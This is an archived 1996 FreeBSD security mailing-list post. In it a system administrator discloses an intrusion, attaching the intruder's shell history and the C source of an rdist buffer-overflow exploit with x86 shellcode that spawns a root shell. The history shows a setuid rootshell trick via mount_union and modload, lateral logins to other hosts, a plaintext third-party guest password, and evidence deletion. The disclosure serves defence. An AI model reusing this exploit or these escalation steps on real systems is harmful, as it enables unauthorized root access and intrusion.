Date: Sun, 14 Jul 1996 23:52:43 -0700 (PDT) From: jbhunt <jbhunt@mercury.gaianet.net> To: freebsd-security-notification@freebsd.org Cc: freebsd-security@freebsd.org, root@mercury.gaianet.net Subject: New EXPLOIT located! Message-ID: <Pine.BSF.3.91.960714212321.1806A-300000@mercury.gaianet.net>
next in thread | raw e-mail | index | archive | help
[-- Attachment #1 --] Ok, for almost 3 weeks now we at Gaianet have been tracking root hackers around our box. FINALLY, today at about 3 pm one of them made a BIG BIG mistake. Fortunately, for us I was around to watch what happened and kill the user before he was able to erase his history files and the exploit itself. So here are the files necessary to fix whatever hole this exploits. We run Freebsd Current so it obviously makes most freebsd systems vulnerable to a root attack. I appreciate any help you can offer. John SysAdmin Gaianet [-- Attachment #2 --] #+0837233007 ls #+0837233007 ps x #+0837233007 crontab -e #+0837233007 crontab -e #+0837233007 ls #+0837233007 rm botchk #+0837233007 ps x #+0837233007 ps x #+0837233007 ps #+0837233007 cd .Karma96 #+0837233007 ls #+0837233007 botchk #+0837233007 ps #+0837233007 pico botchk #+0837233007 s x #+0837233007 ls #+0837233007 ps x #+0837233007 cd #+0837233007 ps #+0837233007 ls #+0837233007 cd .Karma96 #+0837233007 ls #+0837233007 pico Bot.Set #+0837233007 irc MrPenis #+0837233007 telnet albyl.ies.luth.se #+0837233007 telnet linus.artech.se #+0837233007 ls #+0837233007 cd .Karma96 #+0837233007 ls #+0837233007 pico Bot.Levels #+0837233007 ls #+0837233007 pico ComBot.lists #+0837233007 ps x #+0837233007 kill - 9757 #+0837233007 kil -9 757 #+0837233007 Com #+0837233007 kill -9 757 #+0837233007 ComBot #+0837233007 ps x #+0837233007 rlogin -l ls linus.artech.se #+0837233007 rlogin #+0837233007 help #+0837233007 rlogin -l root linus.artech.se #+0837233007 rlogin -l root sunny.bahnhof.se #+0837233007 rlogin -l ls linus.artech.se #+0837233007 rlogi #+0837233007 rlogin rlogi #+0837233007 rlogin -l henrikw sunny.bahnhof.se #+0837233007 xxc #+0837233007 ssh #+0837233007 rlogin kuai.se #+0837233007 S #+0837233007 rlogin linus.artech.se #+0837233007 rlogin linus.artech.se #+0837233007 rlogin albyl.ies.luth.se #+0837233007 rlogin -u 94b-cnb albyl.ies.luth.se #+0837233007 relogin -l 94b-cnb albyl.ies.luth.se #+0837233007 rlogin -l 94b-cnb albyl.ies.luth.se #+0837233007 w #+0837233007 add #+0837233007 rlogin linus.artech.se #+0837233007 ps x #+0837233007 kill -9 22624 #+0837233007 kill -9 22626 #+0837233007 ls #+0837233007 ps x #+0837233007 rlogin linus.artech.se #+0837233007 rlogin linus.artech.se: #+0837233007 ps #+0837233007 ps x #+0837233007 rlogin linus.artech.se #+0837233007 rlogin linus.artech.se #+0837233007 rlogin linus.artech.se #+0837233007 rlogin linus.artech.se #+0837233007 rlogin albyl.ies.luth.se #+0837233007 telnet mother.kajen.com #+0837233007 telnet mother.kajen.com #+0837233007 andersnotelnet mother.kajen.com #+0837233007 andersno #+0837233007 tenet mother.kajen.com #+0837233007 telnet mother.kajen.com #+0837233007 telnet mother.kajen.com #+0837233007 telnet mother.kajen.se #+0837233007 telnet kajen.se #+0837233007 telnet linus.artech.se #+0837233007 tel #+0837233007 rlogin linus.artech.se #+0837233007 rlogin albyl.ies.luth.se #+0837233007 rlogin linus.artech.se -l ls #+0837233007 telnet flash-west.lakeheadu.ca #+0837233007 irc #+0837233007 irc #+0837233007 irc #+0837233007 irc #+0837233007 s #+0837233007 ls #+0837233007 ls #+0837233007 psx #+0837233007 ps x #+0837233007 ps #+0837233007 x #+0837233007 irc MacSourcE irc-2.stelath.net 5550 #+0837233007 zzz #+0837233007 irc MacSourcE #+0837233007 irc QuickTake irc.kern.com 6665 #+0837233007 irc MacSOS irc.epix.net 6665 #+0837233007 ir #+0837233007 /load textbox.irc #+0837233007 irc #+0837233007 ls #+0837233007 ps x #+0837233007 cd .Karma96 #+0837233007 ls #+0837233007 pico botchk #+0837233007 ls #+0837233007 ComBot #+0837233007 ps x #+0837233007 irc SonOSatan #+0837233007 ls #+0837233007 pico botchk #+0837233007 ls #+0837233007 botchk #+0837233007 ps x #+0837233007 crontab #+0837233007 crontab -e #+0837233007 ls #+0837233007 irc #+0837233007 irc #+0837233007 ps x #+0837233007 p #+0837233007 crontab -e #+0837233007 irc McH- irc.kern.com 6665 #+0837233007 ail #+0837233007 ps x #+0837233007 mail #+0837233007 rm c/var/mail/bgreg #+0837233007 /var/mail/bgreg #+0837233007 rm /var/mail/bgreg #+0837233007 cd /var/mail/bgreg #+0837233007 em #+0837233007 rm /var/mail/bgreg #+0837233007 irc #+0837233007 irc OldWarez irc.kern.com 6665 #+0837233007 irc Mofo #+0837233007 irc Moofo irc.mcs.net 6665 #+0837233007 rc Moofo irc.gate.net 6665 #+0837233007 rc Moofo irc.gate.net 6665 #+0837233007 irc #+0837233007 irc Moofo irc.ionet.net #+0837233007 irc Moofo irc.kern.com 6665 #+0837233007 ls #+0837233007 pico NewMACFilez_FAQ.txt #+0837233007 irc Moses irc.gate.net 6665 #+0837233007 irc #+0837233007 irc Gaylin #+0837233007 6 #+0837233007 irc #+0837233007 irc Gaylin irc.kern.com 6665 #+0837233007 irc MrFoose piglet.cc.utexas.edu 6665 #+0837233007 zxcas #+0837233007 irc MrFoose irc.bridge.net 6665 #+0837233007 irc TheHood irc.cris.com 6665 #+0837233007 irc Madam irc.spyder.org 6665 #+0837233007 irc #+0837233007 / #+0837233007 irc Julus irc.winternetcom 6665 #+0837233007 irc Moofo irc.winternet.com 6665 #+0837233007 ps x #+0837233007 irc RecCheck #+0837233007 irc Thrashed irc.kern.com 6665 #+0837233007 irc Thrashed irc.kern.rlogin linus.artech.se #+0834263877 rlogin albyl.ies.luth.se #+0834263877 rlogin linus.artech.se -l ls #+0834263877 telnet flash-west.lakeheadu.ca #+0834263877 irc #+0834263877 irc #+0834263877 irc #+0834263877 irc #+0834263877 s #+0834263877 ls #+0834263877 ls #+0834263877 psx #+0834263877 ps x #+0834263877 ps #+0834263877 x #+0834263910 irc MacSourcE irc-2.stelath.net 5550 #+0834263920 zzz #+0834263925 irc MacSourcE #+0834291161 irc QuickTake irc.kern.com 6665 #+0834292904 irc MacSOS irc.epix.net 6665 #+0834366923 ir #+0834366926 /load textbox.irc #+0834366928 irc #+0834407134 ls #+0834407137 ps x #+0834407144 cd .Karma96 #+0834407144 ls #+0834407155 pico botchk #+0834407168 ls #+0834407173 ComBot #+0834407177 ps x #+0834407192 irc SonOSatan #+0834407341 ls #+0834407349 pico botchk #+0834407369 ls #+0834407375 botchk #+0834407380 pirc #+0837233007 q #+0837233007 irc #+0837233007 irc #+0837233007 telnet netvirtual.com #+0837233007 virtual.com #+0837233007 telnet netvirtual.com #+0837233007 irc Aspect][ irc.stealth.net:6665 #+0837233007 irc Aspect][ irc.uic.edu 6665 #+0837233007 irc Aspect][ irc.phoenix.net:6665 #+0837233007 irc #+0837233007 lynx http://www.blue-cow.com/ #+0837233007 cd .secret #+0837233007 cloines.pl #+0837233007 ls #+0837233007 clones.pl #+0837233007 ./clones.pl #+0837233007 chmod +x clones.pl #+0837233007 clones.pl #+0837233007 perl clones.pl #+0837233007 perl5.001 clones.pl #+0837233007 ls #+0837233007 perl clones.pl #+0837233007 telnet alf.uccs.edu #+0837233007 telnet TriState.TSEI.K12.MS.US #+0837233007 153.37.93.61 #+0837233007 irc MacFriend irc.phoenix.net:6665 #+0837233007 ls #+0837233007 tar -xvf Karma96.tar #+0837233007 tar -cvf Karma96.tar .Karma96 #+0837233007 ls #+0837233007 gzip Karma96.tar #+0837233007 ls #+0837233007 rm c.pl #+0837233007 cd .secret #+0837233007 mv clones.pl dick_doubler #+0837233007 cd #+0837233007 irc MacH- irc.voicenet.com:6665 #+0837233007 irc Quaz irc.voicenet.com:6665 #+0837233007 irc MacH- irc.neosoft.com:6665 #+0837233007 whoami #+0837233007 ; ^?ls #+0837233007 ls #+0837233007 irc.ionet.net #+0834462070 irc Moofo irc.kern.com 6665 #+0834462461 ls #+0834462468 pico NewMACFilez_FAQ.txt #+0834463519 irc Moses irc.gate.net 6665 #+0834463749 irc #+0834513921 irc Gaylin #+0834513966 6 #+0834513969 irc #+0834514033 irc Gaylin irc.kern.com 6665 #+0834527496 irc MrFoose piglet.cc.utexas.edu 6665 #+0834530564 zxcas #+0834530570 irc MrFoose irc.bridge.net 6665 #+0834530738 irc TheHood irc.cris.com 6665 #+0834530834 irc Madam irc.spyder.org 6665 #+0834530860 irc #+0834530893 / #+0834530910 irc Julus irc.winternetcom 6665 #+0834531005 irc Moofo irc.winternet.com 6665 #+0834592640 ps x #+0834592679 irc RecCheck #+0834602243 irc Thrashed irc.kern.com 6665 #+0834602334 irc Thrashed irc.kern.com 6665 #+0834602671 irc Thrashed irc.ionet.net #+0834602706 xczxzXczxcZXirc #+0834602711 irc #+0834602774 irc /sserver #+0834602778 irc Mr #+0834602815 d #+0834606811 ls #+0834606816 ps x #+0834606819 cd .karma96 #+0834606825 cd .Karma96 #+0834606828 ComBot #+0834606835 ps x #+0834612306 telnet wtelnet wakko.gil.net #+0834612324 telnet wakko.gil.net #+0834635257 chmod +x clones.pl #+0834635261 limits #+0834635266 clones.pl #+0834636712 rm clones.pl #+0834636715 ]bye #+0834636715 quit #+0834636715 q #+0834636742 rm clonesq #+0834764665 telnet cns.networkamerica.com #+0834765074 rlogin linus.artech.se -l ls #+0834765136 rlog #+0834765161 rlogin linus.artech.se -l thomas #+0834765272 telnet scooby.tiac.net #+0834765634 ls #+0834765646 cd .Karma96 #+0834765654 ps x #+0834765662 ComBot #+0834765901 telnet scooby.tiac.net #+0834766199 cxcx #+0835484480 cd .secret #+0835484499 perl5.001 clones.pl #+0835484504 ls #+0835484514 chmod +x clones.pl #+0835484517 ls #+0835484519 clones.pl #+0835484525 perl clones.pl #+0835484539 perl #+0835484568 perl15 clones.pl #+0835484573 perl clones.pl #+0835484781 chmod +p clones.pl #+0835484783 clones.pl #+0835484791 chmod -x clones.pl #+0835484792 ls #+0835484796 clones.pl #+0835484800 perl clones.pl #+0835554162 irc Immortal irc.ionet.net:6665 #+0835554218 irc #+0835554255 irc Immortal irc.bridge.net 6665 #+0835576307 irc ddd irc.bridge.net 6665 #+0835663051 irc GetBack irc.ais.net:6665 #+0835740871 irc GateIt irc.gate.net:6665 #+0835748330 irc BeJesus irc.gate.net:6665 #+0835749143 irc Scanner irc.ionet.net:6665 #+0835749541 irc #+0835749561 rver irc. #+0835749563 r #+0835749564 irc #+0835749594 q #+0835749599 irc #+0835749689 irc #+0835752975 telnet netvirtual.com #+0835755590 virtual.com #+0835755596 telnet netvirtual.com #+0836021757 irc Aspect][ irc.stealth.net:6665 #+0836021885 irc Aspect][ irc.uic.edu 6665 #+0836022158 irc Aspect][ irc.phoenix.net:6665 #+0836022699 irc #+0836027500 lynx http://www.blue-cow.com/ #+0836067253 cd .secret #+0836067257 cloines.pl #+0836067258 ls #+0836067261 clones.pl #+0836067264 ./clones.pl #+0836067336 chmod +x clones.pl #+0836067339 clones.pl #+0836067343 perl clones.pl #+0836067361 perl5.001 clones.pl #+0836067366 ls #+0836067450 perl clones.pl #+0836067470 telnet alf.uccs.edu #+0836067492 telnet TriState.TSEI.K12.MS.US #+0836067788 153.37.93.61 #+0836086091 irc MacFriend irc.phoenix.net:6665 #+0836207825 ls #+0836207829 tar -xvf Karma96.tar #+0836207909 tar -cvf Karma96.tar .Karma96 #+0836207913 ls #+0836207930 gzip Karma96.tar #+0837099748 ls #+0837099762 rm c.pl #+0837099766 cd .secret #+0837099775 mv clones.pl dick_doubler #+0837099778 cd #+0837099800 irc MacH- irc.voicenet.com:6665 #+0837136232 irc Quaz irc.voicenet.com:6665 #+0837152438 irc MacH- irc.neosoft.com:6665 #+0837218680 ls #+0837218692 cp Karma96.tar.gz ~/.secret #+0837218694 cd .secret #+0837218695 ls #+0837218703 mv Karma96.tar.gz k #+0837218705 ls #+0837218707 cd #+0837218708 ls #+0837218712 rm Karma96.tar.gz #+0837218716 passwd #+0837218724 passwd #+0837218737 ls #+0837218781 irc MacH- irc.netvirtual.com:6665 #+0837219220 irc MacH- #+0837220444 telnet *RyeBrye* Dude, telnet to griffin.emba.uvm.edu username: guest1-60 pw:fred949 #+0837220450 telnet griffin.emba.uvm.e #+0837220455 telnet griffin.emba.uvm.e #+0837220462 telnet griffin.emba.uvm.edu #+0837220501 xz #+0837220511 telnet emba.uvm.edu #+0837221920 rct #+0837221922 ls #+0837221937 ps x #+0837221942 csh #+0837233051 irc MacH- thorn.got.net:666 #+0837249687 ls #+0837249719 who #+0837249734 ls #+0837249745 rm karma96 #+0837249747 ks #+0837249748 ls #+0837249751 ls #+0837249754 ls #+0837249760 ls #+0837249764 ls #+0837249766 ls #+0837249769 l #+0837249782 ftp digital.netvoyage.net #+0837249802 ls #+0837249812 ftp digital.netvoyage.net #+0837249828 ls #+0837249857 ls #+0837249861 ls #+0837249873 irc #+0837249878 irc -d #+0837250075 ls #+0837250080 cc -o zap zap.c #+0837250085 pico zap.c #+0837250089 exit #+0837250124 ls #+0837250127 pico zap.c #+0837250151 ls #+0837250159 cc -o zap zap.c #+0837250168 cc -o c c.c #+0837250175 cc -o a a.c #+0837250177 ls #+0837250184 rm a.c #+0837250186 rm c.c #+0837250191 irc #+0837250241 ls #+0837250245 ls #+0837250249 rm c #+0837250253 ls #+0837250265 cd /etc #+0837250266 ls #+0837250275 pico passwd #+0837250281 cd #+0837250285 pico c.c #+0837250292 ls #+0837250301 a #+0837250447 ls #+0837250451 ls #+0837250454 rm c #+0837250458 ls #+0837250461 pico c.c #+0837250468 cd /etc #+0837250476 pico passwd #+0837250488 cd #+0837250490 pico c.c #+0837250509 cc -o c #+0837250513 cc -o c c.c #+0837250514 c #+0837252383 exit #+0837288372 w #+0837310427 rpc #+0837310455 find / -name ircd.conf -print #+0837310656 zxczxcctalk #+0837310662 talk superduck #+0837310675 w #+0837310696 talk hawkie #+0837310816 zxc #+0837310818 w #+0837310878 ./t3 194.22.189.95 #+0837310889 t3 #+0837311105 talk hawkie@mercury.gaianet.net #+0837311209 irc MacH irc.cris.com:6665 #+0837311405 ls #+0837311409 pico mountbug.txt #+0837311443 ls #+0837311454 at > /tmp/modload #+0837311460 cat > /tmp/modload #+0837311462 ccat > /tmp/modload #+0837311464 cat > /tmp/modload #+0837311495 cp /bin/sh /tmp/rootshell #+0837311506 chmod 4755 /tmp/rootshell #+0837311533 cd /tmp #+0837311535 ls #+0837311543 rootshell #+0837311647 cd /tmp #+0837311648 ls #+0837311652 rootshell #+0837312174 cd /tmp #+0837312175 ls #+0837312181 rm rootshell #+0837312192 t3 #+0837312207 cat > /tmp/modload #+0837312233 cp /bin/sh /tmp/rootshell #+0837312238 ls #+0837312248 chmod 4755 /tmp/rootshell #+0837312255 chmod 4755 /tmp/rootshell #+0837312263 chmod +x /tmp/modload #+0837312272 set path= ( /tmp $path ) #+0837312279 mkdir /tmp/a #+0837312287 mkdir /tmp/b #+0837312294 /sbin/mount_union /tmp/a /tmp/b #+0837312316 cp /sbin/mount_union /tmp/a /tmp/b #+0837312325 /tmp/rootshell #+0837312648 cd /tmp #+0837312650 ls #+0837312656 ps -aux #+0837312690 syslogd #+0837312699 screen #+0837314733 cd .secret #+0837314736 dick_doubler #+0837314738 ls #+0837314755 pico dick_doubler #+0837315057 telnet www.hookup.net #+0837315752 telnet www.hookup.net #+0837316927 nslookup 185.37.209.17 #+0837317334 find -name rpc -print #+0837317353 find / -name rpc -print #+0837317404 /usr/src/etc/rpc #+0837317409 /usr/src/include/rpc #+0837317413 /usr/src/lib/libc_r/rpc #+0837317416 /usr/src/lib/libc/rpc #+0837317424 cd / #+0837317425 ls #+0837317432 ls -l #+0837317450 COPYRIGHT #+0837317456 OK #+0837317466 cd bin #+0837317470 ls -l #+0837317482 cd / #+0837317483 ls #+0837317489 ls -l #+0837317497 62 ; 1 ; 6c cdrom #+0837317500 cd cdrom #+0837317503 ls #+0837317508 ls -l #+0837317511 cd #+0837317514 cd / #+0837317544 cd cdcompat #+0837317548 cd compat #+0837317550 ls -l #+0837317559 cd linux #+0837317563 ls -l #+0837317574 cd etc #+0837317577 ls -l #+0837317639 cd /compat/linux #+0837317642 ls -l #+0837317647 cd lib #+0837317649 ls -l #+0837317662 ls / -l #+0837317733 ls -l #+0837317739 dc / #+0837317818 cd / #+0837317820 ls -l #+0837317944 root #+0837317947 proc #+0837317950 mnt #+0837317961 lkm #+0837317977 cd root #+0837317979 ls #+0837317988 acreate.sh #+0837317991 ls -l #+0837317999 cd / #+0837318000 ls -l #+0837318015 cd proc #+0837318017 ls #+0837318022 ls -l #+0837318037 95 #+0837318050 cd / #+0837318054 ls -l #+0837318081 cd dev #+0837318082 ls #+0837318105 vga #+0837318112 ls -l #+0837318224 kmem #+0837318313 cd / #+0837318314 ls #+0837318317 ls -l #+0837318329 cd /etc #+0837318330 ls #+0837318335 ls -l #+0837318367 ls -ltermcap #+0837318371 termcap #+0837318378 rpc #+0837318396 pico spwd.db #+0837318408 ls -l #+0837318461 rmt #+0837318471 whoami #+0837318559 adduser.conf.bak #+0837319004 find / -name root -print #+0837321186 talk ( digital@millennium.stealth.net #+0837321192 talk digital@millennium.stealth.net #+0837321260 write digital@millennium.stealth.net #+0837321276 write digital@stealth.net #+0837321335 telnet irc02.irc.aol.com #+0837321458 write digital@millennium.stealth.net #+0837321501 write sdebnath@home.metnet.com #+0837321515 write zirc@tundra.winternet.com #+0837321527 write zirc@winternet.com #+0837321536 talk digital@millennium.stealth.net #+0837321971 w #+0837321983 ping -l 99999 digital #+0837322074 ls #+0837322076 sl #+0837322076 sls #+0837322077 sls #+0837322078 ls #+0837322079 ls #+0837322080 sl #+0837322081 sls #+0837322108 locate #+0837322113 locate root #+0837322124 locate ircd.conf #+0837322146 /usr/src/etc/root #+0837322165 locate rpc #+0837322366 cd / #+0837322367 ls #+0837322374 cdrom' #+0837322377 kernel.GENERIC #+0837322380 kernel.old #+0837322386 kernel #+0837322391 cd mnt #+0837322392 ls #+0837322398 lk 0l #+0837322409 uname -a #+0837322433 l #+0837322441 locate ROOT #+0837322456 find / -name ROOT -print #+0837322830 irc GoatOp irc.cris.com:6665 #+0837373784 name -a #+0837373788 uname -a #+0837375479 ls #+0837375490 cd /usr #+0837375491 ls #+0837375494 cd/tmp #+0837375496 cd/ tmp #+0837375499 ls #+0837375509 cd /tm[ #+0837375512 cd /tmp #+0837375513 ls #+0837375523 umkdep1505 #+0837375528 cd /usr/tmp #+0837375529 ls #+0837375532 cd #+0837375543 od tin_nntp010238 #+0837375546 htstatus.000213 ice0043.JPG mkdep1588 screenss tin_nntp028551 #+0837375546 bgreg@mercury [1:18pm][/tmp] >> umkdep1505 #+0837375546 umkdep1505: Command not found. #+0837375546 bgreg@mercury [1:18pm][/tmp] >> cd /usr/tmp #+0837375546 bgreg@mercury [1:18pm][/usr/tmp] >> ls #+0837375547 018.JPG ice0040.JPG kernel+ibcs2 saver_mod tin_nntp010238 #+0837375547 htstatus.000213 ice0043.JPG mkdep1588 screens tin_nntp028551 #+0837375548 bgreg@mercury [1:18pm][/usr/tmp] >> cd #+0837375548 bgreg@mercury [1:18pm][~] >> od tin_nntp010238 #+0837375548 hexdump: tin_nntp010238: No such file or directory #+0837375551 bgreg@mercury [1:19pm][~] >> htstatus.000213 ice0043.J[/tmp] >> cd /usr/tmp #+0837375551 bgreg@mercury: No match. #+0837375551 bgreg@mercury [1:19pm][~] >> bgreg@mercury [1:18pm][/usr/tmp] >> ls #+0837375551 bgreg@mercury: No match. #+0837375551 bgreg@mercury [1:19pm][~] >> 018.JPG ice0040.JPG kernel+ibcs2 sav #+0837375552 er_mod tin_nntp010238 #+0837375552 018.JPG: Command not found. #+0837375552 bgreg@mercury [1:19pm][~] >> htstatus.000213 ice0043.JPG mkdep1588 scr #+0837375553 eens tin_nntp028551 #+0837375553 htstatus.000213: Command not found. #+0837375553 bgreg@mercury [1:19pm][~] >> bgreg@mercury [1:18pm][/usr/tmp] >> cd #+0837375553 bgreg@mercury: No match.[/tmp] >> cd /usr/tmp #+0837375554 bgreg@mercury: No match. #+0837375554 bgreg@mercury [1:19pm][~] >> bgreg@mercury [1:18pm][/usr/tmp] >> ls #+0837375554 bgreg@mercury: No match. #+0837375554 bgreg@mercury [1:19pm][~] >> 018.JPG ice0040.JPG kernel+ibcs2 sav #+0837375555 er_mod tin_nntp010238 #+0837375555 018.JPG: Command not found. #+0837375555 bgreg@mercury [1:19pm][~] >> htstatus.000213 ice0043.JPG mkdep1588 scr #+0837375556 eens tin_nntp028551 #+0837375556 htstatus.000213: Command not found. #+0837375556 bgreg@mercury [1:19pm][~] >> bgreg@mercury [1:18pm][/usr/tmp] >> cd #+0837375556 bgreg@mercury: No match.[/tmp] >> cd /usr/tmp #+0837375556 bgreg@mercury: No match. #+0837375556 bgreg@mercury [1:19pm][~] >> bgreg@mercury [1:18pm][/usr/tmp] >> ls #+0837375556 bgreg@mercury: No match. #+0837375556 bgreg@mercury [1:19pm][~] >> 018.JPG ice0040.JPG kernel+ibcs2 sav #+0837375557 er_mod tin_nntp010238 #+0837375557 018.JPG: Command not found. #+0837375565 bgreg@mercury [1:19pm][~] >> htstatus.000213 ice0043.JPG mkdep1588 scmmand not found. #+0837375565 htstatus.000213:: Too many arguments. #+0837375565 bgreg@mercury [1:19pm][~] >> bgreg@mercury [1:19pm][~] >> bgreg@mercury [1:18pm] #+0837375565 [/usr/tmp] >> cd #+0837375566 Ambiguous output redirect. #+0837375566 bgreg@mercury [1:19pm][~] >> bgreg@mercury: No match.[/tmp] >> cd /usr/tmp #+0837375566 cd: Too many arguments. #+0837375566 bgreg@mercury [1:19pm][~] >> bgreg@mercury: No match. #+0837375567 bgreg@mercury:: Too many arguments. #+0837375567 bgreg@mercury [1:19pm][~] >> bgreg@mercury [1:19pm][~] >> bgreg@mercury [1:18pm] #+0837375567 [/usr/tmp] >> ls #+0837375567 Ambiguous output redirect. #+0837375567 bgreg@mercury [1:19pm][~] >> bgreg@mercury: No match. #+0837375567 bgreg@mercury:: Too many arguments. #+0837375567 bgreg@mercury [1:19pm][~] >> bgreg@mercury [1:19pm][~] >> 018.JPG ice004 #+0837375567 0.JPG kernel+ibcs2 sav #+0837375568 bgreg@mercury: No match. #+0837375568 bgreg@mercury [1:19pm][~] >> er_mod tin_nntp010238 #+0837375568 er_mod: Command not found. #+0837375568 bgreg@mercury [1:19pm][~] >> 018.JPG: Command not found. #+0837375573 018.JPG:: Too many arguments.kjsad\]a #+0837375576 trhere a re to manu #+0837375577 ls -l #+0837375578 cd / #+0837375579 l #+0837375589 chroot #+0837375604 ps -aux #+0837375640 itv #+0837375643 irc #+0837375755 passwd #+0837375761 passwd #+0837375797 cd #+0837375800 ls #+0837375807 ls #+0837375824 cd /home/bgreg #+0837375835 ls #+0837375901 w #+0837375913 ls #+0837375933 rm -rf htstatus.000213 od ls i 018.JPG: 018.JPG umkdep1505 #+0837375935 ls #+0837375947 rm -rf er_mod dead.letter cd #+0837375949 ls #+0837375970 w #+0837376000 wrote erb #+0837376003 write erb #+0837376020 w #+0837376071 finger erb #+0837376109 w #+0837376128 ls #+0837376206 w #+0837376216 irc #+0837376421 w #+0837376432 cd /bin/sh #+0837376434 cd /bin/sh #+0837376438 cd bin? #+0837376454 ls #+0837376550 irc Mc9 irc.superlink.net #+0837376924 rumisad #+0837376928 rumisbad #+0837376931 w #+0837376947 ls #+0837376954 ls -l #+0837376980 z #+0837376990 z.o #+0837376994 z.o #+0837376999 a.out #+0837378120 w #+0837378129 talk bgreg #+0837378167 talk bgreg@mercury.gaianet.net #+0837378403 w #+0837378421 ps x #+0837378434 kill -9 15685 #+0837378442 kill -9 15437 #+0837378445 ls #+0837378562 ls #+0837378569 ddd #+0837378592 a.out #+0837379448 ls #+0837379458 gcc -o d d.c #+0837379461 d #+0837379506 whoami #+0837379510 root #+0837379515 d #+0837379606 login #+0837380631 c [-- Attachment #3 --] #include <stdio.h> #include <stdlib.h> #include <unistd.h> #define DEFAULT_OFFSET 50 #define BUFFER_SIZE 256 long get_esp(void) { __asm__("movl %esp,%eax\n"); } main(int argc, char **argv) { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; /* so you dont have to disassemble it, here is the asm code: start: jmp endofk0dez realstart: popl %esi leal (%esi), %ebx movl %ebx, 0x0b(%esi) xorl %edx, %edx movl %edx, 7(%esi) movl %edx, 0x0f(%esi) movl %edx, 0x14(%esi) movb %edx, 0x19(%esi) xorl %eax, %eax movb $59, %al leal 0x0b(%esi), %ecx movl %ecx, %edx pushl %edx pushl %ecx pushl %ebx pushl %eax jmp bewm endofk0dez: call realstart .byte '/', 'b', 'i', 'n', '/', 's', 'h' .byte 1, 1, 1, 1 .byte 2, 2, 2, 2 .byte 3, 3, 3, 3 bewm: .byte 0x9a, 4, 4, 4, 4, 7, 4 */ char execshell[] = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2" "\x89\x56\x07" "\x89\x56\x0f" "\x89\x56\x14" "\x88\x56\x19" "\x31\xc0" "\xb0\x3b" "\x8d\x4e\x0b" "\x89\xca" "\x52" "\x51" "\x53" "\x50" "\xeb\x18" "\xe8\xd8\xff\xff\xff" "/bin/sh" "\x01\x01\x01\x01" "\x02\x02\x02\x02" "\x03\x03\x03\x03" "\x9a\x04\x04\x04\x04\x07\x04"; int i; int ofs = DEFAULT_OFFSET; /* if we have a argument, use it as offset, else use default */ if(argc == 2) ofs = atoi(argv[1]); /* print the offset in use */ printf("Using offset of esp + %d (%x)\n", ofs, get_esp()+ofs); buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; /* fill start of buffer with nops */ memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); /* stick asm code into the buffer */ for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; /* write the return addresses ** ** return address 4 ** ebp 4 ** register unsigned n 0 ** register char *cp 0 ** register struct syment *s 0 ** ** total: 8 */ addr_ptr = (long *)ptr; for(i=0;i < (8/4);i++) *(addr_ptr++) = get_esp() + ofs; ptr = (char *)addr_ptr; *ptr = 0; execl("/usr/bin/rdist", "rdist", "-d", buff, "-d", buff, NULL); }
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.3.91.960714212321.1806A-300000>